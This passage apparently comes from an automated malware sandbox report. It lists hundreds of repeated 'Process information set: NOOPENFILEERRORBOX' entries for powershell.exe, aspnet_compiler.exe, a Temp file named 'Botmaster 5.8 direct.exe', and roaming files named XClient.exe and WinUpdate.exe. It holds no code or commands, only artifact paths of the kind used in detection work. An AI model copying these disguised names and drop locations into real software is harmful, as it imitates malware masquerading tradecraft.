                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
